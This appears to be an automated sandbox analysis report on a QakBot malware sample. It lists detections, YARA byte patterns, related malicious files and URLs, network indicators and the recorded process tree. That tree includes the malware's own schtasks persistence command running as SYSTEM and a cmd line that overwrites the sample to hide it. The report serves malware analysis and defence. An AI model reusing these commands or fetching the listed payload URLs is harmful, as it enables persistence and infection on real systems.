0.0.zhAQkCQvME.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.hfoah	Download File
26.2.conhost.exe.1e0000.1.unpack	100%	Avira	HEUR/AGEN.1007600	Download File
14.0.jkfkdm.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.hfoah	Download File
18.2.jkfkdm.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File
18.1.jkfkdm.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.zhAQkCQvME.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File
17.1.jkfkdm.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
21.2.dwm.exe.13b0000.1.unpack	100%	Avira	HEUR/AGEN.1007600	Download File
6.1.jkfkdm.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.1.zhAQkCQvME.exe.1c20000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.jkfkdm.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File
6.0.jkfkdm.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.hfoah	Download File
24.2.conhost.exe.11d0000.2.unpack	100%	Avira	HEUR/AGEN.1007600	Download File
7.1.jkfkdm.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	Virustotal		Browse
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	Virustotal		Browse
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
https://9i43.gifabc11application/x-shockwave-flash	0%	Avira URL Cloud	safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQzZDU5ZjFhY2VmYzk3ZDhjYTk4NDhmMDYwNjk1Y2JiMTA5Z	0%	Avira URL Cloud	safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6IjI2NTk3ZDdlZTYwMzFkMzk0ODg0N2Q0ZDdjMDZhM2Y2NDM3M	0%	Avira URL Cloud	safe
https://162.244.225.30/	0%	Virustotal		Browse
https://162.244.225.30/	0%	Avira URL Cloud	safe
https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1	0%	Avira URL Cloud	safe
http://schemas.xmlsoa	0%	Avira URL Cloud	safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6ImMzZDkyYjY0ZGRiNGYzNjgwYTJjNTY2ZDdmOWEzMGUyZjdjY	0%	Avira URL Cloud	safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6IjdkZGUzNDRkMmI2YjI4YjRhM2YzOWRiOTcyMzY5Y2EzNzJlY	0%	Avira URL Cloud	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.488530565.00EF0000.00000004.00000001.sdmp	Datper	detect Datper in memory	JPCERT/CC Incident Response Group	0x1c36:$a1: E8 03 00 00 0x268a:$a1: E8 03 00 00 0x27ba:$a1: E8 03 00 00 0x2b5b:$a1: E8 03 00 00 0x3a23:$a1: E8 03 00 00 0xa2d9:$a1: E8 03 00 00 0xab92:$a1: E8 03 00 00 0xdeb9:$a1: E8 03 00 00 0xdeca:$a1: E8 03 00 00 0xded2:$a1: E8 03 00 00 0x11a59:$a1: E8 03 00 00 0x176f6:$a1: E8 03 00 00 0x194cb:$a1: E8 03 00 00 0x1956d:$a1: E8 03 00 00 0x1c31c:$a1: E8 03 00 00 0x206eb:$a1: E8 03 00 00 0x20717:$a1: E8 03 00 00 0x29a54:$b1: \|\|\| 0x29a55:$b1: \|\|\| 0x2a290:$b1: \|\|\| 0x2a291:$b1: \|\|\|
0000000C.00000003.535349218.01779000.00000004.00000001.sdmp	Datper	detect Datper in memory	JPCERT/CC Incident Response Group	0x2dfe:$a1: E8 03 00 00 0x3852:$a1: E8 03 00 00 0x3982:$a1: E8 03 00 00 0x3d23:$a1: E8 03 00 00 0x4beb:$a1: E8 03 00 00 0xb4a1:$a1: E8 03 00 00 0xbd5a:$a1: E8 03 00 00 0xf081:$a1: E8 03 00 00 0xf092:$a1: E8 03 00 00 0xf09a:$a1: E8 03 00 00 0x12c21:$a1: E8 03 00 00 0x188be:$a1: E8 03 00 00 0x1a693:$a1: E8 03 00 00 0x1a735:$a1: E8 03 00 00 0x1d4e4:$a1: E8 03 00 00 0x218b3:$a1: E8 03 00 00 0x218df:$a1: E8 03 00 00 0x2ac1c:$b1: \|\|\| 0x2ac1d:$b1: \|\|\| 0x2b458:$b1: \|\|\| 0x2b459:$b1: \|\|\|
0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp	QakBot	QakBot Payload	kevoreilly	0xb40e:$anti_sandbox: 8D 4D FC 51 E8 59 CD FF FF 83 C4 04 E8 31 FA FF FF 85 C0 7E 07 C7 45 F8 00 00 00 00 33 D2 74 02 ... 0x5491:$decrypt_config2: 8B 45 08 8B 88 24 04 00 00 51 8B 55 10 83 EA 14 52 8B 45 0C 83 C0 14 50 6A 14 8B 4D 0C 51 E8 6C ...
00000000.00000002.470976903.015F7000.00000004.00000040.sdmp	Datper	detect Datper in memory	JPCERT/CC Incident Response Group	0x3376:$a1: E8 03 00 00 0x3dca:$a1: E8 03 00 00 0x3efa:$a1: E8 03 00 00 0x429b:$a1: E8 03 00 00 0x5163:$a1: E8 03 00 00 0xba19:$a1: E8 03 00 00 0xc2d2:$a1: E8 03 00 00 0xf5f9:$a1: E8 03 00 00 0xf60a:$a1: E8 03 00 00 0xf612:$a1: E8 03 00 00 0x13199:$a1: E8 03 00 00 0x18e36:$a1: E8 03 00 00 0x1ac0b:$a1: E8 03 00 00 0x1acad:$a1: E8 03 00 00 0x1da5c:$a1: E8 03 00 00 0x21e2b:$a1: E8 03 00 00 0x21e57:$a1: E8 03 00 00 0x2bf94:$b1: \|\|\| 0x2bf95:$b1: \|\|\| 0x2c7d0:$b1: \|\|\| 0x2c7d1:$b1: \|\|\|
00000000.00000002.472365977.01B20000.00000004.00000001.sdmp	Datper	detect Datper in memory	JPCERT/CC Incident Response Group	0x1c36:$a1: E8 03 00 00 0x268a:$a1: E8 03 00 00 0x27ba:$a1: E8 03 00 00 0x2b5b:$a1: E8 03 00 00 0x3a23:$a1: E8 03 00 00 0xa2d9:$a1: E8 03 00 00 0xab92:$a1: E8 03 00 00 0xdeb9:$a1: E8 03 00 00 0xdeca:$a1: E8 03 00 00 0xded2:$a1: E8 03 00 00 0x11a59:$a1: E8 03 00 00 0x176f6:$a1: E8 03 00 00 0x194cb:$a1: E8 03 00 00 0x1956d:$a1: E8 03 00 00 0x1c31c:$a1: E8 03 00 00 0x206eb:$a1: E8 03 00 00 0x20717:$a1: E8 03 00 00 0x29a54:$b1: \|\|\| 0x29a55:$b1: \|\|\| 0x2a290:$b1: \|\|\| 0x2a291:$b1: \|\|\|
0000000C.00000002.753280657.01500000.00000040.00000001.sdmp	Datper	detect Datper in memory	JPCERT/CC Incident Response Group	0x239e:$a1: E8 03 00 00 0x2df2:$a1: E8 03 00 00 0x2f22:$a1: E8 03 00 00 0x32c3:$a1: E8 03 00 00 0x418b:$a1: E8 03 00 00 0xaa41:$a1: E8 03 00 00 0xb2fa:$a1: E8 03 00 00 0xe621:$a1: E8 03 00 00 0xe632:$a1: E8 03 00 00 0xe63a:$a1: E8 03 00 00 0x121c1:$a1: E8 03 00 00 0x17e5e:$a1: E8 03 00 00 0x19c33:$a1: E8 03 00 00 0x19cd5:$a1: E8 03 00 00 0x1ca84:$a1: E8 03 00 00 0x20e53:$a1: E8 03 00 00 0x20e7f:$a1: E8 03 00 00 0x2afbc:$b1: \|\|\| 0x2afbd:$b1: \|\|\| 0x2b7f8:$b1: \|\|\| 0x2b7f9:$b1: \|\|\|
0000000C.00000002.753280657.01500000.00000040.00000001.sdmp	QakBot	QakBot Payload	kevoreilly	0x17951:$decrypt_config2: 8B 45 08 8B 88 24 04 00 00 51 8B 55 10 83 EA 14 52 8B 45 0C 83 C0 14 50 6A 14 8B 4D 0C 51 E8 6C ...
00000005.00000002.485394157.00AC7000.00000004.00000040.sdmp	Datper	detect Datper in memory	JPCERT/CC Incident Response Group	0x3376:$a1: E8 03 00 00 0x3dca:$a1: E8 03 00 00 0x3efa:$a1: E8 03 00 00 0x429b:$a1: E8 03 00 00 0x5163:$a1: E8 03 00 00 0xba19:$a1: E8 03 00 00 0xc2d2:$a1: E8 03 00 00 0xf5f9:$a1: E8 03 00 00 0xf60a:$a1: E8 03 00 00 0xf612:$a1: E8 03 00 00 0x13199:$a1: E8 03 00 00 0x18e36:$a1: E8 03 00 00 0x1ac0b:$a1: E8 03 00 00 0x1acad:$a1: E8 03 00 00 0x1da5c:$a1: E8 03 00 00 0x21e2b:$a1: E8 03 00 00 0x21e57:$a1: E8 03 00 00 0x2bf94:$b1: \|\|\| 0x2bf95:$b1: \|\|\| 0x2c7d0:$b1: \|\|\| 0x2c7d1:$b1: \|\|\|
Process Memory Space: zhAQkCQvME.exe PID: 2444	JoeSecurity_Qbot	Yara detected Qbot	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
12.2.explorer.exe.3f0000.0.unpack	QakBot	QakBot Payload	kevoreilly	0xa80e:$anti_sandbox: 8D 4D FC 51 E8 59 CD FF FF 83 C4 04 E8 31 FA FF FF 85 C0 7E 07 C7 45 F8 00 00 00 00 33 D2 74 02 ... 0x4891:$decrypt_config2: 8B 45 08 8B 88 24 04 00 00 51 8B 55 10 83 EA 14 52 8B 45 0C 83 C0 14 50 6A 14 8B 4D 0C 51 E8 6C ...
12.2.explorer.exe.3f0000.0.raw.unpack	QakBot	QakBot Payload	kevoreilly	0xb40e:$anti_sandbox: 8D 4D FC 51 E8 59 CD FF FF 83 C4 04 E8 31 FA FF FF 85 C0 7E 07 C7 45 F8 00 00 00 00 33 D2 74 02 ... 0x5491:$decrypt_config2: 8B 45 08 8B 88 24 04 00 00 51 8B 55 10 83 EA 14 52 8B 45 0C 83 C0 14 50 6A 14 8B 4D 0C 51 E8 6C ...
14.2.jkfkdm.exe.400000.1.unpack	QakBot	QakBot Payload	kevoreilly	0xa80e:$anti_sandbox: 8D 4D FC 51 E8 59 CD FF FF 83 C4 04 E8 31 FA FF FF 85 C0 7E 07 C7 45 F8 00 00 00 00 33 D2 74 02 ... 0x4891:$decrypt_config2: 8B 45 08 8B 88 24 04 00 00 51 8B 55 10 83 EA 14 52 8B 45 0C 83 C0 14 50 6A 14 8B 4D 0C 51 E8 6C ...
12.2.explorer.exe.1500000.3.unpack	Datper	detect Datper in memory	JPCERT/CC Incident Response Group	0x179e:$a1: E8 03 00 00 0x21f2:$a1: E8 03 00 00 0x2322:$a1: E8 03 00 00 0x26c3:$a1: E8 03 00 00 0x358b:$a1: E8 03 00 00 0x9e41:$a1: E8 03 00 00 0xa6fa:$a1: E8 03 00 00 0xda21:$a1: E8 03 00 00 0xda32:$a1: E8 03 00 00 0xda3a:$a1: E8 03 00 00 0x115c1:$a1: E8 03 00 00 0x1725e:$a1: E8 03 00 00 0x19033:$a1: E8 03 00 00 0x190d5:$a1: E8 03 00 00 0x1be84:$a1: E8 03 00 00 0x20253:$a1: E8 03 00 00 0x2027f:$a1: E8 03 00 00 0x295bc:$b1: \|\|\| 0x295bd:$b1: \|\|\| 0x29df8:$b1: \|\|\| 0x29df9:$b1: \|\|\|
12.2.explorer.exe.1500000.3.unpack	QakBot	QakBot Payload	kevoreilly	0x16d51:$decrypt_config2: 8B 45 08 8B 88 24 04 00 00 51 8B 55 10 83 EA 14 52 8B 45 0C 83 C0 14 50 6A 14 8B 4D 0C 51 E8 6C ...
7.2.jkfkdm.exe.400000.1.unpack	QakBot	QakBot Payload	kevoreilly	0xa80e:$anti_sandbox: 8D 4D FC 51 E8 59 CD FF FF 83 C4 04 E8 31 FA FF FF 85 C0 7E 07 C7 45 F8 00 00 00 00 33 D2 74 02 ... 0x4891:$decrypt_config2: 8B 45 08 8B 88 24 04 00 00 51 8B 55 10 83 EA 14 52 8B 45 0C 83 C0 14 50 6A 14 8B 4D 0C 51 E8 6C ...
6.2.jkfkdm.exe.400000.1.unpack	QakBot	QakBot Payload	kevoreilly	0xa80e:$anti_sandbox: 8D 4D FC 51 E8 59 CD FF FF 83 C4 04 E8 31 FA FF FF 85 C0 7E 07 C7 45 F8 00 00 00 00 33 D2 74 02 ... 0x4891:$decrypt_config2: 8B 45 08 8B 88 24 04 00 00 51 8B 55 10 83 EA 14 52 8B 45 0C 83 C0 14 50 6A 14 8B 4D 0C 51 E8 6C ...
2.2.jkfkdm.exe.400000.1.unpack	QakBot	QakBot Payload	kevoreilly	0xa80e:$anti_sandbox: 8D 4D FC 51 E8 59 CD FF FF 83 C4 04 E8 31 FA FF FF 85 C0 7E 07 C7 45 F8 00 00 00 00 33 D2 74 02 ... 0x4891:$decrypt_config2: 8B 45 08 8B 88 24 04 00 00 51 8B 55 10 83 EA 14 52 8B 45 0C 83 C0 14 50 6A 14 8B 4D 0C 51 E8 6C ...
0.2.zhAQkCQvME.exe.400000.1.unpack	QakBot	QakBot Payload	kevoreilly	0xa80e:$anti_sandbox: 8D 4D FC 51 E8 59 CD FF FF 83 C4 04 E8 31 FA FF FF 85 C0 7E 07 C7 45 F8 00 00 00 00 33 D2 74 02 ... 0x4891:$decrypt_config2: 8B 45 08 8B 88 24 04 00 00 51 8B 55 10 83 EA 14 52 8B 45 0C 83 C0 14 50 6A 14 8B 4D 0C 51 E8 6C ...
12.2.explorer.exe.1500000.3.raw.unpack	Datper	detect Datper in memory	JPCERT/CC Incident Response Group	0x239e:$a1: E8 03 00 00 0x2df2:$a1: E8 03 00 00 0x2f22:$a1: E8 03 00 00 0x32c3:$a1: E8 03 00 00 0x418b:$a1: E8 03 00 00 0xaa41:$a1: E8 03 00 00 0xb2fa:$a1: E8 03 00 00 0xe621:$a1: E8 03 00 00 0xe632:$a1: E8 03 00 00 0xe63a:$a1: E8 03 00 00 0x121c1:$a1: E8 03 00 00 0x17e5e:$a1: E8 03 00 00 0x19c33:$a1: E8 03 00 00 0x19cd5:$a1: E8 03 00 00 0x1ca84:$a1: E8 03 00 00 0x20e53:$a1: E8 03 00 00 0x20e7f:$a1: E8 03 00 00 0x2afbc:$b1: \|\|\| 0x2afbd:$b1: \|\|\| 0x2b7f8:$b1: \|\|\| 0x2b7f9:$b1: \|\|\|
12.2.explorer.exe.1500000.3.raw.unpack	QakBot	QakBot Payload	kevoreilly	0x17951:$decrypt_config2: 8B 45 08 8B 88 24 04 00 00 51 8B 55 10 83 EA 14 52 8B 45 0C 83 C0 14 50 6A 14 8B 4D 0C 51 E8 6C ...
5.2.zhAQkCQvME.exe.400000.1.unpack	QakBot	QakBot Payload	kevoreilly	0xa80e:$anti_sandbox: 8D 4D FC 51 E8 59 CD FF FF 83 C4 04 E8 31 FA FF FF 85 C0 7E 07 C7 45 F8 00 00 00 00 33 D2 74 02 ... 0x4891:$decrypt_config2: 8B 45 08 8B 88 24 04 00 00 51 8B 55 10 83 EA 14 52 8B 45 0C 83 C0 14 50 6A 14 8B 4D 0C 51 E8 6C ...
18.2.jkfkdm.exe.400000.1.unpack	QakBot	QakBot Payload	kevoreilly	0xa80e:$anti_sandbox: 8D 4D FC 51 E8 59 CD FF FF 83 C4 04 E8 31 FA FF FF 85 C0 7E 07 C7 45 F8 00 00 00 00 33 D2 74 02 ... 0x4891:$decrypt_config2: 8B 45 08 8B 88 24 04 00 00 51 8B 55 10 83 EA 14 52 8B 45 0C 83 C0 14 50 6A 14 8B 4D 0C 51 E8 6C ...
1.2.zhAQkCQvME.exe.400000.1.unpack	QakBot	QakBot Payload	kevoreilly	0xa80e:$anti_sandbox: 8D 4D FC 51 E8 59 CD FF FF 83 C4 04 E8 31 FA FF FF 85 C0 7E 07 C7 45 F8 00 00 00 00 33 D2 74 02 ... 0x4891:$decrypt_config2: 8B 45 08 8B 88 24 04 00 00 51 8B 55 10 83 EA 14 52 8B 45 0C 83 C0 14 50 6A 14 8B 4D 0C 51 E8 6C ...
17.2.jkfkdm.exe.400000.1.unpack	QakBot	QakBot Payload	kevoreilly	0xa80e:$anti_sandbox: 8D 4D FC 51 E8 59 CD FF FF 83 C4 04 E8 31 FA FF FF 85 C0 7E 07 C7 45 F8 00 00 00 00 33 D2 74 02 ... 0x4891:$decrypt_config2: 8B 45 08 8B 88 24 04 00 00 51 8B 55 10 83 EA 14 52 8B 45 0C 83 C0 14 50 6A 14 8B 4D 0C 51 E8 6C ...

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
23.49.13.33	vlltike.exe	Get hash	malicious	Browse
	103237972.62.exe	Get hash	malicious	Browse
	Operating Agreement 0102282019c02.doc	Get hash	malicious	Browse
	Operating Agreement 0102282019c02.doc	Get hash	malicious	Browse
	Operating Agreement 0102282019a00.doc	Get hash	malicious	Browse
	Operating Agreement 0102282019a00.doc	Get hash	malicious	Browse
	957043_6ZK2400309.xml	Get hash	malicious	Browse
	Agreement_01142019b.doc	Get hash	malicious	Browse
	Agreement_01142019b.doc	Get hash	malicious	Browse
162.244.225.30	http://jeevanmate.com/assets/plugins/bootstrap-modal/img/_vti_cnf/CO7221619133069235401.zip	Get hash	malicious	Browse
209.126.124.166	103237972.62.exe	Get hash	malicious	Browse	www.ip-adress.com/
	Operating Agreement 0102282019c02.doc	Get hash	malicious	Browse	www.ip-adress.com/
	Operating Agreement 0102282019c02.doc	Get hash	malicious	Browse	www.ip-adress.com/
	957043_6ZK2400309.xml	Get hash	malicious	Browse	www.ip-adress.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.ip-adress.com	vlltike.exe	Get hash	malicious	Browse	85.93.89.6
	103237972.62.exe	Get hash	malicious	Browse	209.126.124.166
	Operating Agreement 0102282019c02.doc	Get hash	malicious	Browse	209.126.124.166
	Operating Agreement 0102282019c02.doc	Get hash	malicious	Browse	209.126.124.166
	Operating Agreement 0102282019a00.doc	Get hash	malicious	Browse	85.93.88.251
	Operating Agreement 0102282019a00.doc	Get hash	malicious	Browse	85.93.88.251
	957043_6ZK2400309.xml	Get hash	malicious	Browse	209.126.124.166
	Agreement_01142019b.doc	Get hash	malicious	Browse	85.93.89.6
	Agreement_01142019b.doc	Get hash	malicious	Browse	85.93.88.251

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CARSON-RTCA-CarsonCommunicationsLLCUS	http://jeevanmate.com/assets/plugins/bootstrap-modal/img/_vti_cnf/CO7221619133069235401.zip	Get hash	malicious	Browse	162.244.225.30
CARSON-RTCA-CarsonCommunicationsLLCUS	roil_rvdpf.vbs	Get hash	malicious	Browse	162.244.224.166
unknown	http://pingclock.net	Get hash	malicious	Browse	172.241.69.28
	http://pingclock.net/21db1c5c8b372aecca.js	Get hash	malicious	Browse	172.241.69.28
	http://mbsal.com/MBSRS.exe	Get hash	malicious	Browse	52.232.106.174
	219_1.doc	Get hash	malicious	Browse	5.188.108.58
	rSBnYh8Oge	Get hash	malicious	Browse	216.58.201.74
	virus.doc	Get hash	malicious	Browse	148.66.136.217
	aaaaa.exe	Get hash	malicious	Browse	127.0.0.1
	https://invoicingpaymentdue.blogspot.com/b/post-preview?token=APq4FmBZb1KT8BdomnzOR8fVp5TDdBzuBlrL9V9MVrbzx_R1qA4JV386U4orUlu_29p3fG4cJH3QsRmby7NHmri2UuX1YVuvwqMarGeiSqfLO7cQx6iAbqyZGSGx7ojzQ660lLUlWlid&postId=2643391519197208988&type=POST	Get hash	malicious	Browse	216.58.201.65
	https://vmail.trifalga.com/loading.html#pankit.desai@sequretek.com	Get hash	malicious	Browse	185.87.187.198
	https://jjcardsandgifts.com/wp-content/plugins/apikey/download/6922.zip	Get hash	malicious	Browse	198.187.28.167
	Remittance Advice.html	Get hash	malicious	Browse	13.224.96.17
	https://jinanherbs.com/db/mobile/html	Get hash	malicious	Browse	138.128.170.10
	http://getapp.paradiskus.com/up/dl/1495373619430762/pupdate.exe	Get hash	malicious	Browse	68.183.19.241
	Cover_letter1244486564.doc	Get hash	malicious	Browse	5.188.108.58
	Cover_letter1244486564.doc	Get hash	malicious	Browse	93.189.149.187
	cas.exe	Get hash	malicious	Browse	77.88.21.158
	http://pingclock.net/21db1c5c8b372aecca.js	Get hash	malicious	Browse	172.241.69.28
	2019204938483922_11_13_2019.pdf.htm	Get hash	malicious	Browse	152.199.23.37
	N_910 del 06_10_19.xls	Get hash	malicious	Browse	173.232.146.171
	Cover_letter1225776086.doc	Get hash	malicious	Browse	5.188.108.58
unknown	http://pingclock.net	Get hash	malicious	Browse	172.241.69.28
	http://pingclock.net/21db1c5c8b372aecca.js	Get hash	malicious	Browse	172.241.69.28
	http://mbsal.com/MBSRS.exe	Get hash	malicious	Browse	52.232.106.174
	219_1.doc	Get hash	malicious	Browse	5.188.108.58
	rSBnYh8Oge	Get hash	malicious	Browse	216.58.201.74
	virus.doc	Get hash	malicious	Browse	148.66.136.217
	aaaaa.exe	Get hash	malicious	Browse	127.0.0.1
	https://invoicingpaymentdue.blogspot.com/b/post-preview?token=APq4FmBZb1KT8BdomnzOR8fVp5TDdBzuBlrL9V9MVrbzx_R1qA4JV386U4orUlu_29p3fG4cJH3QsRmby7NHmri2UuX1YVuvwqMarGeiSqfLO7cQx6iAbqyZGSGx7ojzQ660lLUlWlid&postId=2643391519197208988&type=POST	Get hash	malicious	Browse	216.58.201.65
	https://vmail.trifalga.com/loading.html#pankit.desai@sequretek.com	Get hash	malicious	Browse	185.87.187.198
	https://jjcardsandgifts.com/wp-content/plugins/apikey/download/6922.zip	Get hash	malicious	Browse	198.187.28.167
	Remittance Advice.html	Get hash	malicious	Browse	13.224.96.17
	https://jinanherbs.com/db/mobile/html	Get hash	malicious	Browse	138.128.170.10
	http://getapp.paradiskus.com/up/dl/1495373619430762/pupdate.exe	Get hash	malicious	Browse	68.183.19.241
	Cover_letter1244486564.doc	Get hash	malicious	Browse	5.188.108.58
	Cover_letter1244486564.doc	Get hash	malicious	Browse	93.189.149.187
	cas.exe	Get hash	malicious	Browse	77.88.21.158
	http://pingclock.net/21db1c5c8b372aecca.js	Get hash	malicious	Browse	172.241.69.28
	2019204938483922_11_13_2019.pdf.htm	Get hash	malicious	Browse	152.199.23.37
	N_910 del 06_10_19.xls	Get hash	malicious	Browse	173.232.146.171
	Cover_letter1225776086.doc	Get hash	malicious	Browse	5.188.108.58

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	Remittance Advice.html	Get hash	malicious	Browse	209.126.124.166
	test.doc	Get hash	malicious	Browse	209.126.124.166
	Anuncio importante.doc	Get hash	malicious	Browse	209.126.124.166
	University College Dublin Shared Document.docx	Get hash	malicious	Browse	209.126.124.166
	Bonus Plan.doc	Get hash	malicious	Browse	209.126.124.166
	Anuncio importante.doc	Get hash	malicious	Browse	209.126.124.166
	AccountInvoice8472.xlsm	Get hash	malicious	Browse	209.126.124.166
	AccountInvoice8472.xlsm	Get hash	malicious	Browse	209.126.124.166
	test.doc	Get hash	malicious	Browse	209.126.124.166
	JHE-004673889596.xls	Get hash	malicious	Browse	209.126.124.166
	Shasta resume.doc	Get hash	malicious	Browse	209.126.124.166
	http://info-iconplc.com	Get hash	malicious	Browse	209.126.124.166
	John Azbill - Harassment complaint letter (212-546-4000).doc	Get hash	malicious	Browse	209.126.124.166
	OneDrive (1).pdf	Get hash	malicious	Browse	209.126.124.166
	John Azbill - Harassment complaint letter (212-546-4000).doc	Get hash	malicious	Browse	209.126.124.166
	John Azbill - Harassment complaint letter (212-546-4000).doc	Get hash	malicious	Browse	209.126.124.166
	Agreement.docx	Get hash	malicious	Browse	209.126.124.166
	John Azbill - Harassment complaint letter (212-546-4000).doc	Get hash	malicious	Browse	209.126.124.166
	Harassment complaint letter.doc	Get hash	malicious	Browse	209.126.124.166
	OneDrive.pdf	Get hash	malicious	Browse	209.126.124.166
eb88d0b3e1961a0562f006e5ce2a0b87	vlltike.exe	Get hash	malicious	Browse	162.244.225.30
	103237972.62.exe	Get hash	malicious	Browse	162.244.225.30
	957043_6ZK2400309.xml	Get hash	malicious	Browse	162.244.225.30

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\Desktop\zhAQkCQvME.exe	vlltike.exe	Get hash	malicious	Browse
	103237972.62.exe	Get hash	malicious	Browse
	vlltike.exe	Get hash	malicious	Browse
	103237972.62.exe	Get hash	malicious	Browse
	Operating Agreement 0102282019c02.doc	Get hash	malicious	Browse
	Operating Agreement 0102282019c02.doc	Get hash	malicious	Browse
	Operating Agreement 0102282019a00.doc	Get hash	malicious	Browse
	Operating Agreement 0102282019a00.doc	Get hash	malicious	Browse
	957043_6ZK2400309.xml	Get hash	malicious	Browse
	Agreement_01142019b.doc	Get hash	malicious	Browse
	Agreement_01142019b.doc	Get hash	malicious	Browse
	sYd4FTqbr6.exe	Get hash	malicious	Browse
	uyrieaj.exe	Get hash	malicious	Browse
	jbtblo.exe	Get hash	malicious	Browse
	XFrEhB8Kir.exe	Get hash	malicious	Browse
	qfcluop.exe	Get hash	malicious	Browse
	nqpug.exe	Get hash	malicious	Browse
	ufeqqukv.exe	Get hash	malicious	Browse

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Startup

System is w7_1

zhAQkCQvME.exe (PID: 2276 cmdline: 'C:\Users\user\Desktop\zhAQkCQvME.exe' MD5: E7DE0CC04F0A433FCE5336B7C7504D2C)

zhAQkCQvME.exe (PID: 2380 cmdline: C:\Users\user\Desktop\zhAQkCQvME.exe /C MD5: E7DE0CC04F0A433FCE5336B7C7504D2C)

jkfkdm.exe (PID: 2340 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe MD5: E7DE0CC04F0A433FCE5336B7C7504D2C)

jkfkdm.exe (PID: 2424 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe /C MD5: E7DE0CC04F0A433FCE5336B7C7504D2C)

explorer.exe (PID: 2600 cmdline: C:\Windows\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

taskhost.exe (PID: 1432 cmdline: taskhost.exe MD5: 72E953215CADE1A726C04AAFDF6B463D)

dwm.exe (PID: 1612 cmdline: C:\Windows\system32\Dwm.exe MD5: 505BF4D1CADEB8D4F8BCD08D944DE25D)

explorer.exe (PID: 1692 cmdline: C:\Windows\Explorer.EXE MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

conhost.exe (PID: 3208 cmdline: C:\Windows\system32\conhost.exe '-1424767469172410782218338736475073951151716783479-3432011951180489686930716817 MD5: 761D6906DE888CF832606CFCDC9E7C47)

notepad.exe (PID: 3240 cmdline: notepad MD5: A4F6DF0E33E644E802C8798ED94D80EA)

conhost.exe (PID: 3608 cmdline: C:\Windows\system32\conhost.exe '-1474411583-1677719561-3844903701797535695-949774581987480516-1169154459-1441374392 MD5: 761D6906DE888CF832606CFCDC9E7C47)

schtasks.exe (PID: 2416 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn ahizzkkevf /tr '\'C:\Users\user\Desktop\zhAQkCQvME.exe\' /I ahizzkkevf' /SC ONCE /Z /ST 19:29 /ET 19:41 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

zhAQkCQvME.exe (PID: 2444 cmdline: C:\Users\user\Desktop\zhAQkCQvME.exe /I ahizzkkevf MD5: E7DE0CC04F0A433FCE5336B7C7504D2C)

jkfkdm.exe (PID: 2480 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe MD5: E7DE0CC04F0A433FCE5336B7C7504D2C)

jkfkdm.exe (PID: 2660 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe /C MD5: E7DE0CC04F0A433FCE5336B7C7504D2C)

cmd.exe (PID: 2460 cmdline: 'C:\Windows\System32\cmd.exe' /c ping.exe -n 6 127.0.0.1 & type 'C:\Windows\System32\calc.exe' > 'C:\Users\user\Desktop\zhAQkCQvME.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

PING.EXE (PID: 2592 cmdline: ping.exe -n 6 127.0.0.1 MD5: 6242E3D67787CCBF4E06AD2982853144)

schtasks.exe (PID: 2532 cmdline: 'C:\Windows\system32\schtasks.exe' /DELETE /F /TN ahizzkkevf MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

jkfkdm.exe (PID: 696 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe' MD5: E7DE0CC04F0A433FCE5336B7C7504D2C)

jkfkdm.exe (PID: 1864 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe /C MD5: E7DE0CC04F0A433FCE5336B7C7504D2C)

cleanup

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TM8F7R7G\Y0S5SGVE.htm Download File
Process:	C:\Windows\explorer.exe
File Type:	HTML document, UTF-8 Unicode text, with very long lines
Size (bytes):	28550
Entropy (8bit):	5.617695193208009
Encrypted:	false
MD5:	096632DFB3832AB9296351FFF6D3DF8D
